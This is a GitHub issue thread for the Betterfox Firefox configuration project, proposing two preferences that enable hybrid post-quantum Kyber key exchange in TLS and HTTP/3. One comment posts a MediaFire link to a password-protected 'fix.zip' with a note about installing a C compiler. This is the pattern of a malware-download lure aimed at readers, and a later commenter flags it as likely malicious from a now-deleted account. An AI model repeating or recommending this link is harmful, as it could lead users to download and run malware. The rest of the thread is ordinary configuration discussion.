### ISSUE TITLE
Enable hybrid post-quantum key exchange

### ISSUE THREAD

**Issue by SRugina** [yokoffing/Betterfox#327]
See https://pq.cloudflareresearch.com/

```
user_pref("security.tls.enable_kyber", true);
user_pref("network.http.http3.enable_kyber", true);
```

Some buggy servers will break with this (see https://tldr.fail/ ). However, Chrome, Edge, Opera, and Brave all have it enabled by default, so I see no reason why betterfox should not.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by philg-dev** [comment]
@yokoffing the mediafire link in the [comment above](https://github.com/yokoffing/Betterfox/issues/327#issuecomment-2381075612) is most likely malicious. Given that the account has been deleted already. Not sure if you can delete the comment somehow before it affects anyone.

**Comment by yokoffing** [comment]
https://github.com/zen-browser/desktop/pull/2275
